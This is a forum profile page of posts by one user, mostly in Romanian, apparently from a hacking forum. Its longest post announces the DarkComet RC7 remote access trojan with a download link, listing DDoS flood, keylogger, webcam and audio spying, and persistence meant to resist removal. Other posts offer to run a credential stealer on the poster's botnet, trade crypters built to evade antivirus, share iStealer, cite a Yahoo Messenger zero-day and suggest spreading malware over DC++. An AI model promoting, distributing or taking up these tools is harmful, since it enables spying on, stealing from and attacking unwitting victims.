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Everything posted by Paul4games
Ok daca gasesti vreun bug te rog anunta-ma!
Sunt mandru sa va prezint Darkcomet RC7(ultimul RC) Ce este nou: - A big problem fixed now when use lose windows session or shutdown computer no more message will said that this programm can't be shutdown... - Some mistakes fixed - Now when you load more than 1 time a server editor settings it wont display 2x connections int the list - New shortcut added in the SIN Popup (learn them it is very very userfull) - New SIN Popup section added in bot functions (DDOS) - Http flood added ( i am not responsible of your acts for this kind of functions ) Http flood will create about 300..600..1000(for the best) threads wich create a Http connection with a broken Http request about 10 bot can fuck a total website then be very carefull use this only to test your website security! - Bot functions now send tasks more slowly to be sure it will work! - New bot function added : Open Web Page ( with page corrector ) - Service Description Added - Service Install new method! - Now keylogger plugin is include in server no need to install before and will be automatically installed if you choose active keylogger on server startup in server editor. - Now you active a function to save each stream picture of webcam when activated it will slow a bit the capture but on disable it will be the same speed as before. - Some bug fix for folders creation on Client when using SIN Popup shortcut - Music is added in About ( was a long time i had need to change the methode cause on windows seven ) the bassmod.dll plug wasnt working correctly but not all working fine !!!! . - Power Startup Added on Expert edit server moder , i really recommand you to use that mode because if you choose a none systeme path you will be sure it will be correctly load each startup time and it have a persistance method then each time the computer disable or delete the key it will come back then if you use persistance in power startup + persistance server it will be very very very very hard to uninstall the RAT. - Some windows Messages/Controls fixed - [HOT] New sound capture totally recoded full streamed : i decide to make a perfect sound capture it tooks me a fucking long time but i did it now you can full stream the remote sound with maximum 1 sec of delay enter the receive and real time for me its less than 1 sec. You can choose some parameters and custom some of them you can also like for MSN click on a button to send some sound to the server you have 20 sec max to send a record sound (you need to stay click on the REC button to talk when you up the mouse it automaticaly send the sound) - Now plugins server side support the forms - Now on remote desktop you can Wheel UP/DOWN in real time (very very fast) - Some plugin errors fixed - Some weird problem fixed on socket close and now when client is closed it will clean all connections before to prevent some bugs on some routers. - Small editor mode (Normal Edit Server mode) removed cause it was confusing many people now expert mode for everybody its not so hard to understand now !! - In editor now Mutex is auto new generate to be sure you will not have each time the same - Now you can rename the Server ID - Thumbail view in SIN listview (now you can preview the desktop insteed of the flags) [sTABLE] - Now you can order columns in the SIN by column clicks Download link:http://darkcomet-rat.com/TmpDownload/DarkComet2RC7.zip PS:Creatorul acestui rat este DarkCoderSc,eu sunt doar unul dintre beta testeri.Va rog daca gasiti vreun bug sa il reportati ca sa poata fi fixat!
Toti yi ataca deoarece este cel mai raspandit OS,daca ar fi fost codul expus s-ar fi gasit si mai usor vulnerabilitati+ca de unde ar mai scoate oameni bani sa plateasca toti angajati,daca ari fi codul open-source cine s-ar oferi sa lucreze pe gratis?
Toti pot sa lucreze la patch dar cati stiu?
Zi cum platesti si dupaia mai vorbim,iti stealerul serverul+iti execut stealerul pe 600 din boti meu
Atunci te rog dami si mie spammerul
Pai pe hackhound sunt o gramada+ca am VIP si pe hackforums dar eu am cumparat fly crypter si stiu ca va fi FUD destul timp.....
E super faza cu "Those mother fuckers deserve to die" si baga reasu ala dement:))))
Pierdere de timp sa faci spam...fa cum am zis eu m-ai sus @gamer vezi sa nu imi faci competitie
Si crypter FUD gasesti si istealer pe free...
Ce vb?eu l-am folosit pe pc-ul meu si nu mi s-a intamplat nimci a fost si analizat de unu care stie ce vb si a zis ca e curat......dute pe hackhound la sectiunea SA si il gasesti LE:Analizeazal singur uploadeazal pe anubis fai ce vrei.....
Hai ca deja vad ca toti se apuca sa vanda ce gasesti free,uitati istealer 6.3 curat: iStealer 6.3 Legends.rar
Mda din cate vad eu chatul este foarte populat .......
Acum am venit de la strand,diseara ies prin oras si beau bere.....
Pana la urma au astia exploit privat sau carei faza?
A folosit istealer(sunt aproape sigur)
0day Yahoo! Messenger Exploit, Binary + Source
Paul4games replied to Paul4games's topic in Exploituri
Si nu aveti codul sursa?e in arhiva si codul -
Foloseste PhazeNameLeecher si fa spreading pe strong dc++
Ok si cum facem?adica cum ne organizam sa jucam toti?
Eu sunt pasionat de sah si as vrea sa stiu daca yi mai place cuiva de pe aici? si daca da poate facem si o partida online:D
Man dar vezi ca a aparut o noua versiune cu un bugfix....
Vezi ca nu merge butonul de send cu enter merge dar daca dai click pe send nu merge.
Google depinde de windows ,oricum va fi nevoit sa foloseasca windows pentru testarea viitoarelor programe facute de google.
Google to employees: 'Mac or Linux, but no more Windows'
Paul4games replied to begood's topic in Stiri securitate
Hai ca asata e tare rau de tot,Google foloseste IE in loc sa folosesc browserul creat de ei?)))